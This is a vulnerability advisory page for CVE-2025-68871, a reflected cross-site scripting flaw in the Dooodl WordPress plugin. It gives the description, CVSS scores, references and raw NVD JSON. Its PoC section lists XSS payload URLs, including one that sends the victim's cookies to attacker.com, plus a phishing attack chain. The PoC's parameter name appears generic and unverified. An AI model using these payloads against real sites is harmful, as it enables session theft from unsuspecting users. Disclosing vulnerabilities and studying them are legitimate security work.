CVE-2025-68871

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in noCreativity Dooodl dooodl allows Reflected XSS.This issue affects Dooodl: from n/a through <= 2.3.0.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Dooodl <= 2.3.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-68871 PoC - Reflected XSS in Dooodl WordPress Plugin -->
<!-- Target: WordPress site with Dooodl plugin <= 2.3.0 -->

<!-- Basic XSS PoC URL -->
<!-- Replace 'TARGET_URL' with the vulnerable WordPress site URL -->
<!-- PoC: https://TARGET_URL/wp-content/plugins/dooodl/?param=<script>alert('XSS')</script> -->

<!-- More Obfuscated PoC -->
<!-- PoC: https://TARGET_URL/wp-content/plugins/dooodl/?param=<img src=x onerror=alert(document.domain)> -->

<!-- Cookie Stealing PoC -->
<!-- PoC: https://TARGET_URL/wp-content/plugins/dooodl/?param=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script> -->

<!-- Attack Chain:
1. Attacker crafts malicious URL with XSS payload
2. Attacker tricks victim into clicking the link (phishing email, social engineering)
3. Victim's browser sends request to vulnerable server
4. Server reflects unsanitized input in response
5. Victim's browser executes malicious script
6. Attacker steals session cookies or performs actions as victim
-->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-68871
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-68871
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-68871/
[4] VulDB https://vuldb.com/cve/CVE-2025-68871
[5] https://patchstack.com/database/Wordpress/Plugin/dooodl/vulnerability/wordpress-dooodl-plugin-2-3-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-68871", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:12.417", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in noCreativity Dooodl dooodl allows Reflected XSS.This issue affects Dooodl: from n/a through <= 2.3.0."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en noCreativity Dooodl dooodl permite XSS Reflejado. Este problema afecta a Dooodl: desde n/a hasta <= 2.3.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/dooodl/vulnerability/wordpress-dooodl-plugin-2-3-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}